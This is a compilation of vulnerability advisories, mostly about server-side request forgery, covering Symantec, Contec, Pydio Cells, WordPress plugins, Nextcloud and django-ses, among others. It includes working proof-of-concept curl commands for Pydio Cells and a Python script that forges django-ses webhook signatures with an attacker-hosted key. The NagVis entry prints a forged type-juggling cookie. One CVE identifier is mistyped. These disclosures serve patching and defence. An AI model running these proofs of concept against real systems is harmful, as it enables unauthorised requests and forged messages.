Advanced Secure Gateway and Content Analysis, prior to 7.3.13.1 / 3.1.6.0, may be susceptible to a Stored Cross-Site Scripting vulnerability.

Advanced Secure Gateway and Content Analysis Security Update

**Summary**

Symantec, A Division of Broadcom has released updates to address issues that were discovered in the Advanced Secure Gateway (ASG) and Content Analysis (CAS) products.

**Affected Product(s)**

**Advanced Secure Gateway**

**CVE**

**Affected Version(s)**

**Remediation**

CVE-2023-23952  
CVE-2023-23953  
CVE-2023-23954  
CVE-2023-23955

Prior to 7.3.13.1

Upgrade to 7.3.13.1 or later.

**Content Analysis**

**CVE**

**Affected Version(s)**

**Remediation**

CVE-2023-23952  
CVE-2023-23953  
CVE-2023-23954  
CVE-2203-23955

Prior to 3.1.6.0

Upgrade to 3.1.6.0 or later.

****

**Issue Details**

 **CVE-2023-23952**   

 **Severity/CVSSv3:**

 High / 7.9 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

 **References:**

 **Impact:**

 NVD: CVE-2023-23952

 Command Injection

 **Description:**

 Advanced Secure Gateway and Content Analysis, prior to 7.3.13.1 / 3.1.6.0, may be susceptible to a Command Injection vulnerability.

 **CVE-2023-23953**   

 **Severity/CVSSv3:**

 High / 7.0 AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

 **References:**

 **Impact:**

 NVD: CVE-2023-23953

 Elevation of Privilege

 **Description:**

 Advanced Secure Gateway and Content Analysis, prior to 7.3.13.1 / 3.1.6.0, may be susceptible to a Elevation of Privilege vulnerability. .

 **CVE-2023-23954**   

 **Severity/CVSSv3:**

 Medium / 4.2 AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N

 **References:**

 **Impact:**

 NVD: CVE-2023-23954

 Stored Cross-Site Scripting

 **Description:**

 Advanced Secure Gateway and Content Analysis, prior to 7.3.13.1 / 3.1.6.0, may be susceptible to a Stored Cross-Site Scripting vulnerability. .

 **CVE-2023-23955**   

 **Severity/CVSSv3:**

 Low / 2.2 AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N

 **References:**

 **Impact:**

 NVD: CVE-2023-23955

 Server-Side Request Forgery

 **Description:**

 Advanced Secure Gateway and Content Analysis, prior to 7.3.13.1 / 3.1.6.0, may be susceptible to a Server-Side Request Forgery vulnerability.

**Mitigation & Additional Information**

The following product updates have been made available to customers to remediate these issues:

*   ASG 7.3.13.1
*   CAS 3.1.6.0

Symantec recommends the following measures to reduce risk of attack:

*   Restrict access to administrative or management systems to authorized privileged users.
*   Restrict remote access to trusted/authorized systems only.
*   Run under the principle of least privilege, where possible, to limit the impact of potential exploit.
*   Keep all operating systems and applications current with vendor patches.
*   Follow a multi-layered approach to security. At a minimum, run both firewall and anti-malware applications to provide multiple points of detection and protection for both inbound and outbound threats.
*   Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in the detection of attacks or malicious activity related to the exploitation of latent vulnerabilities.

**Acknowledgements**

*   _CVE-2023-23952: Jerome NOKIN, NATO Cyber Security Centre_

*   _CVE-2023-23953: Jerome NOKIN and Jean-Michel Huguet, NATO Cyber Security Centre_

*   _CVE-2023-23954: Jerome NOKIN, NATO Cyber Security Centre_

*   _CVE-2023-23955: Jerome NOKIN, NATO Cyber Security Centre_

CVE-2023-23954: Support Content Notification - Support Portal - Broadcom support portal

A denial of service vulnerability exists in Contec CONPROSYS HMI System versions 3.5.2 and prior. When there is a time-zone mismatch in certain configuration files, a remote, unauthenticated attacker may deny logins for an extended period of time.

Published:2023/05/31  Last Updated:2023/05/31

**Overview**

CONPROSYS HMI System (CHS) provided by Contec Co., Ltd. contains multiple vulnerabilities.

**Products Affected**

*   CONPROSYS HMI System (CHS) versions prior to 3.5.3

**Description**

CONPROSYS HMI System (CHS) provided by Contec Co., Ltd. contains multiple vulnerabilities listed below.

*   **Plaintext storage of a password (CWE-256)** - CVE-2023-28713
    
    CVSS v3
    
    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    
    **Base Score: 5.5**
    
*   **Incorrect permission assignment for critical resource (CWE-732)** - CVE-2023-28399
    
    CVSS v3
    
    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 7.8**
    
*   **Improper access control (CWE-284)** - CVE-2023-28657
    
    CVSS v3
    
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    
    **Base Score: 8.8**
    
*   **Cross-site scripting (CWE-79)** - CVE-2023-28651
    
    CVSS v3
    
    CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 4.8**
    
*   **Server-side request forgery (CWE-918)**\- CVE-2023-28824
    
    CVSS v3
    
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    
    **Base Score: 4.3**
    
*   **SQL injection (CWE-89)** \- CVE-2023-29154
    
    CVSS v3
    
    CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
    
    **Base Score: 6.7**
    
*   **Improper control of interaction frequency (CWE-799)** - CVE-2023-2758
    
    CVSS v3
    
    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
    
    **Base Score: 3.7**
    

**Impact**

**CVE-2023-28713**  
Because account information of the database is saved in a local file in plaintext, a user who can access the PC where the affected product is installed can obtain the information.  As a result, information in the database may be obtained and/or altered by the user.

**CVE-2023-28399**  
ACL (Access Control List) is not appropriately set to the local folder where the affected product is installed, therefore a wide range of privileges is permitted to a user of the PC where the affected product is installed.  As a result, the user may be able to destroy the system and/or execute a malicious program.

**CVE-2023-28657**  
A user of the PC where the affected product is installed may gain an administrative privilege.  As a result, information regarding the product may be obtained and/or altered by the user.

**CVE-2023-28651**  
If a user who can access the affected product with an administrative privilege configures specially crafted settings, an arbitrary script may be executed on the web browser of the other user who is accessing the affected product with an administrative privilege.

**CVE-2023-28824**  
A user who can access the affected product with an administrative privilege may bypass the database restriction set on the query setting page, and connect to a user unintended database.

**CVE-2023-29154**  
A user who can access the affected product with an administrative privilege may execute an arbitrary SQL command via specially crafted input to the query setting page.

**CVE-2023-2758**  
Because the process to restrict illegitimate repetitive authentication is inadequate, a remote unauthenticated attacker may cause the condition where a user of the product becomes unable to login, by sending a request that contains a specific element in HTTP header repeatedly.

**Solution**

**Update the software**  
Update the software to the latest version according to the information provided by the developer.  
The developer has released Ver.3.5.3 that contains fixes for these vulnerabilities.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

Michael Heinzl reported the vulnerabilities listed below to JPCERT/CC, and JPCERT/CC coordinated with the developer.  
CVE-2023-28713, CVE-2023-28399, CVE-2023-28657, CVE-2023-28651, CVE-2023-28824, CVE-2023-29154

Tenable, Inc. reported CVE-2023-2758 vulnerability to the developer, and based on the coordination request made by the developer, JPCERT/CC coordinated with Tenable, Inc. and the developer.

**Other Information**

CVE-2023-2758: Multiple vulnerabilities in Contec CONPROSYS HMI System (CHS)

A vulnerability has been found in yiwent Vip Video Analysis 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file data/title.php. The manipulation of the argument titurl leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-230359.

CVE-2023-3015

Pydio Cells versions 4.1.2 and below suffer from a server-side request forgery vulnerability.

For longer running processes, Pydio Cells allows for the creation of  
jobs, which are run in the background. The job "remote-download" can be  
used to cause the backend to send a HTTP GET request to a specified URL  
and save the response to a new file. The response file is then available  
in a user-specified folder in Pydio Cells.

Details  
=======

Product: Pydio Cells  
Affected Versions: 4.1.2 and earlier versions  
Fixed Versions: 4.2.0, 4.1.3, 3.0.12  
Vulnerability Type: Server-Side Request Forgery  
Security Risk: medium  
Vendor URL: https://pydio.com/  
Vendor Status: notified  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005  
Advisory Status: published  
CVE: CVE-2023-32750  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750

Introduction  
============

"Pydio Cells is an open-core, self-hosted Document Sharing and  
Collaboration platform (DSC) specifically designed for organizations  
that need advanced document sharing and collaboration without security  
trade-offs or compliance issues."

(from the vendor's homepage)

More Details  
============

Using the REST-API of Pydio Cells it is possible to start jobs. For  
example, when renaming a file or folder an HTTP request similar to the  
following is sent:

------------------------------------------------------------------------  
PUT /a/jobs/user/move HTTP/2  
Host: example.com  
User-Agent: agent  
Accept: application/json  
Authorization: Bearer G4ZRN[...]  
Content-Type: application/json  
Content-Length: 140

{  
  "JobName": "move",  
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"  
}  
------------------------------------------------------------------------

The body contains a JSON object with a job name and additional  
parameters for the job. Besides the "move" job, also a job with the name  
"remote-download" exists. It takes two additional parameters: "urls" and  
"target". In the "urls" parameter, a list of URLs can be specified and in  
the parameter "target" a path can be specified in which to save the  
response. When the job is started, HTTP GET requests are sent from the  
Pydio Cells server to the specified URLs. The responses are saved into a  
file, which are uploaded to the specified folder within Pydio Cells.  
Potential errors are transmitted in a WebSocket channel, which can be  
opened through the "/ws/event" endpoint.

Proof of Concept  
================

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,  
run the following commands to start a "remote-download" job to trigger  
an HTTP request:

------------------------------------------------------------------------  
$ export JWT="<insert JWT here>"

$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \  
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \  
| tee remote-download.json

$ curl --header "Authorization: Bearer $JWT" \  
--header 'Content-Type: application/json' \  
--request PUT \  
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'  
------------------------------------------------------------------------

The URL in the JSON document specifies which URL to request. The "target"  
field in the same document specifies into which folder the response is saved.  
Afterwards, the response is contained in a file in the specified folder.  
Potential errors are communicated through the WebSocket channel.

Workaround  
==========

Limit the services which can be reached by the Pydio Cells server, for  
example using an outbound firewall.

Fix  
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk  
=============

The risk is highly dependent on the environment in which the attacked  
Pydio Cells instance runs. If there are any internal HTTP services which  
expose sensitive data on the same machine or within the same network,  
the server-side request forgery vulnerability could pose a significant  
risk. In other circumstances, the risk could be negligible. Therefore,  
overall the vulnerability is rated as a medium risk.

Timeline  
========

2023-03-23 Vulnerability identified  
2023-05-02 Customer approved disclosure to vendor  
2023-05-02 Vendor notified  
2023-05-03 CVE ID requested  
2023-05-08 Vendor released fixed version  
2023-05-14 CVE ID assigned  
2023-05-16 Vendor asks for a few more days before the advisory is released  
2023-05-30 Advisory released

References  
==========

RedTeam Pentesting GmbH  
=======================

RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.

More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting  
=============================

RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://jobs.redteam-pentesting.de/

--   
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0  
Alter Posthof 1                           Fax : +49 241 510081-99  
52062 Aachen                    https://www.redteam-pentesting.de  
Germany                         Registergericht: Aachen HRB 14004  
Geschäftsführer:                       Patrick Hof, Jens Liebchen

Pydio Cells 4.1.2 Server-Side Request Forgery 

The Orbit Fox by ThemeIsle WordPress plugin before 2.10.24 does not limit URLs which may be used for the stock photo import feature, allowing the user to specify arbitrary URLs. This leads to a server-side request forgery as the user may force the server to access any URL of their choosing.

CVE-2023-2287

The WP Fastest Cache WordPress plugin before 1.1.5 does not have CSRF check in an AJAX action, and does not validate user input before using it in the wp_remote_get() function, leading to a Blind SSRF issue

CVE-2023-1938

A vulnerability was found in JIZHICMS 2.4.5. It has been classified as critical. Affected is the function index of the file TemplateController.php. The manipulation of the argument webapi leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-230082 is the identifier assigned to this vulnerability.

CVE-2023-2927

Nextcloud Mail is a mail app in Nextcloud. A blind SSRF attack allowed to send GET requests to services running in the same web server. It is recommended that the Mail app is update to version 3.02, 2.2.5 or 1.15.3.



**Affected versions**

\>= 2.3.0, >= 1.13.0, >= 1.12.0

**Patched versions**

3.0.2, 2.2.5, 1.15.3

**Description**

**Impact**

A blind SSRF attack allowed to send GET requests to services running in the same web server.

**Patches**

It is recommended that the Mail app is update to version 3.02, 2.2.5 or 1.15.3

**Workarounds**

*   Disable Mail app

**References**

*   HackerOne
*   PullRequest

**For more information**

If you have any questions or comments about this advisory:

*   Create a post in nextcloud/security-advisories
*   Customers: Open a support ticket at support.nextcloud.com

CVE-2023-33184: Blind SSRF in the Mail app on avatar endpoint

Django-SES is a drop-in mail backend for Django. The django_ses library implements a mail backend for Django using AWS Simple Email Service. The library exports the `SESEventWebhookView class` intended to receive signed requests from AWS to handle email bounces, subscriptions, etc. These requests are signed by AWS and are verified by django_ses, however the verification of this signature was found to be flawed as it allowed users to specify arbitrary public certificates. This issue was patched in version 3.5.0.

**Certificate URL: signature verification exposure**

0.  TL;DR:

If you were using the default setting or any amazonaws.com subdomain for AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS, signature verification webhooks would have allowed someone hosting an arbitrary S3 bucket to send verified webhook calls to your server.

django-ses==3.5.0 addresses this by matching the amazonaws.com certificate URLs against a known regex, SES_REGEX_CERT_URL.

1.  Overview

The django\_ses library implements a mail backend for Django using AWS Simple Email Service. The library exports the SESEventWebhookView class intended to receive signed requests from AWS to handle email bounces, subscriptions, etc. These requests are signed by AWS and are verified by django\_ses, however the verification of this signature was found to be flawed as it allowed users to specify arbitrary public certificates.

2.  Description

The SESEventWebhookView view class implements a post handler which receives signed requests. By default (as noted in the README) signature verification is enabled. Signature verification is performed by the verify_event_message utility function which uses the EventMessageVerifier.is_verified method.

This method obtains the public certificate from a URL passed within the request (

def \_get\_cert\_url(self):

"""

Get the signing certificate URL.

Only accept urls that match the domains set in the

AWS\_SNS\_EVENT\_CERT\_TRUSTED\_DOMAINS setting. Sub-domains

are allowed. i.e. if amazonaws.com is in the trusted domains

then sns.us-east-1.amazonaws.com will match.

"""

cert\_url \= self.\_data.get("SigningCertURL")

if not cert\_url:

logger.warning('No signing certificate URL: "%s"', cert\_url)

return None

if not cert\_url.startswith("https://"):

logger.warning('Untrusted certificate URL: "%s"', cert\_url)

return None

url\_obj \= urlparse(cert\_url)

for trusted\_domain in settings.EVENT\_CERT\_DOMAINS:

parts \= trusted\_domain.split(".")

if url\_obj.netloc.split(".")\[\-len(parts) :\] \== parts:

return cert\_url

return None

):

    def \_get\_cert\_url(self):
        """
        Get the signing certificate URL.
        Only accept urls that match the domains set in the
        AWS\_SNS\_EVENT\_CERT\_TRUSTED\_DOMAINS setting. Sub-domains
        are allowed. i.e. if amazonaws.com is in the trusted domains
        then sns.us-east-1.amazonaws.com will match.
        """
        cert\_url \= self.\_data.get("SigningCertURL")
        if not cert\_url:
            logger.warning('No signing certificate URL: "%s"', cert\_url)
            return None

        if not cert\_url.startswith("https://"):
            logger.warning('Untrusted certificate URL: "%s"', cert\_url)
            return None

        url\_obj \= urlparse(cert\_url)
        for trusted\_domain in settings.EVENT\_CERT\_DOMAINS:
            parts \= trusted\_domain.split(".")
            if url\_obj.netloc.split(".")\[\-len(parts) :\] \== parts:
                return cert\_url

        return None

Some validation is performed on the certificate URL to ensure it is from a trusted domain. By default, the trusted domains are (

EVENT\_CERT\_DOMAINS \= getattr(

settings,

'AWS\_SNS\_EVENT\_CERT\_TRUSTED\_DOMAINS',

getattr(

settings,

'AWS\_SNS\_BOUNCE\_CERT\_TRUSTED\_DOMAINS',

(

'amazonaws.com',

'amazon.com',

)

)

)

):

EVENT\_CERT\_DOMAINS \= getattr(
    settings,
    'AWS\_SNS\_EVENT\_CERT\_TRUSTED\_DOMAINS',
    getattr(
        settings,
        'AWS\_SNS\_BOUNCE\_CERT\_TRUSTED\_DOMAINS',
        (
            'amazonaws.com',
            'amazon.com',
        )
    )
)

However, the validation of the certificate URL allows for arbitrary subdomains. Because anyone can host arbitrary files on a subdomain of amazonaws.com (through hosting an AWS S3 bucket), it is possible to host an arbitrary public certificate which gets validated and used to verify signatures.

3.  Proof of Concept

To test the vulnerability, we can create a Django app and install the library:

django-admin startproject demo
cd demo
pip3 install django-ses\[events\]

Then, add the SESEventWebhookView view to the urlpatterns list in urls.py:

from django.urls import path
from django\_ses.views import SESEventWebhookView

urlpatterns \= \[
    path(r'ses/event-webhook/', SESEventWebhookView.as\_view(), name\='handle-event-webhook')
\]

Run the server:

python manage.py runserver

This runs the server on port 8000. Notice that if you send a POST request to /ses/event-webhook it will fail with "Signature verification failed.":

curl -X POST http://localhost:8000/ses/event-webhook/ -d '{"Type":"SubscriptionConfirmation", "SubscribeURL": "https://example.com"}'
Signature verification failed.

The following Python script implements a proof of concept that signs an arbitrary payload using our attacker-controlled private key. For convenience of testing, the certificate is available at

https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/publickey.cer

and the private key is available at

https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/private.key

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric import utils
import json
import requests
from base64 import b64encode

\# https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django\_ses/utils.py#L191
def \_get\_bytes\_to\_sign(\_data):
    """
    Creates the message used for signing SNS notifications.
    This is used to verify the bounce message when it is received.
    """

    \# Depending on the message type the fields to add to the message
    \# differ so we handle that here.
    msg\_type \= \_data.get('Type')
    if msg\_type \== 'Notification':
        fields\_to\_sign \= \[
            'Message',
            'MessageId',
            'Subject',
            'Timestamp',
            'TopicArn',
            'Type',
        \]
    elif (msg\_type \== 'SubscriptionConfirmation' or
          msg\_type \== 'UnsubscribeConfirmation'):
        fields\_to\_sign \= \[
            'Message',
            'MessageId',
            'SubscribeURL',
            'Timestamp',
            'Token',
            'TopicArn',
            'Type',
        \]
    else:
        \# Unrecognized type
        return None

    bytes\_to\_sign \= \[\]
    for field in fields\_to\_sign:
        field\_value \= \_data.get(field)
        if not field\_value:
            continue

        \# Some notification types do not have all fields. Only add fields
        \# with values.
        bytes\_to\_sign.append(f"{field}\\n{field\_value}\\n")

    return "".join(bytes\_to\_sign).encode()

cert\_url \= 'https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/publickey.cer'
\# privkey available here https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/private.key
privkey \= serialization.load\_pem\_private\_key(open('./private.key','rb').read(), password\=None)
target\_endpoint \= 'http://localhost:8000/ses/event-webhook/'

payload \= {
    'Type': 'SubscriptionConfirmation',
    'SubscribeURL': 'http://localhost:9999',
}

sign\_bytes \= \_get\_bytes\_to\_sign(payload)
chosen\_hash \= hashes.SHA1()
hasher \= hashes.Hash(chosen\_hash)
hasher.update(sign\_bytes)
digest \= hasher.finalize()
sig \= privkey.sign(
    digest,
    padding.PKCS1v15(),
    utils.Prehashed(chosen\_hash)
)
payload\['SigningCertURL'\] \= cert\_url
payload\['Signature'\] \= b64encode(sig).decode()

r \= requests.post(target\_endpoint, json\=payload)
print(r.status\_code) \# this is 200, which indicates the message was accepted

3.  Impact

The impact may vary depending on the context of the application and how bounce events are handled. Due to the fact that the library suggests that signatures are verified by default, consumers may consider the data to be trusted and hence use it without appropriate validation. At the very least, this issue allows a (blind) SSRF vulnerability through the SubscriptionConfirmation event type, however I didn't note this having a very large impact on its own.

4.  Credits

Joseph Surin, elttam

5.  Recommendations

If you're not setting a value for AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS, upgrade to v3.5.0 and re-test your webhooks to make sure the signature verification still passes.

If you are setting a value for AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS and it contains amazonaws.com, set the full domain instead. This is best practice even if your domain is not amazonaws.com, to restrict the possible security risk of other subdomains sending verifiable webhook calls.

See django-ses Releases for more details about the code changes.

CVE-2023-33185: django-ses/001-cert-url-signature-verification.md at 3d627067935876487f9938310d5e1fbb249a7778 · django-ses/django-ses

Nagvis before 1.9.34 was discovered to contain an arbitrary file read vulnerability via the component /core/classes/NagVisHoverUrl.php.

**Commits on Aug 29, 2022**

4.  Fix type juggling vulnerability
    
    PHP evaluates \`!=\` a bit loose on the type. So "0000" == "0e5678" is
    true in PHP. An attacker could send a zeroed cookie\_hash \`"0"\*32\` and
    only need an collision with a calculated hash beginning with \`0e\`
    followed by only numbers.
    
    In our tests (with auth.secret set to \`stable\`) a valid cookie is
    \`cmkadmin:58191275:00000000000000000000000000000000\`.
    
    For a remote attacker this would have needed 58,191,275 guesses.
    
    Maximilian Wirtz authored and LarsMichelsen committed
    
    Aug 29, 2022
    
5.  Mitigate arbitrary file read
    
    With this change the URL is restricted to http and https. So no local
    files can be read. This still is a Server-side request forgery (SSRF).
    
    Maximilian Wirtz authored and LarsMichelsen committed
    
    Aug 29, 2022

Tag

#ssrf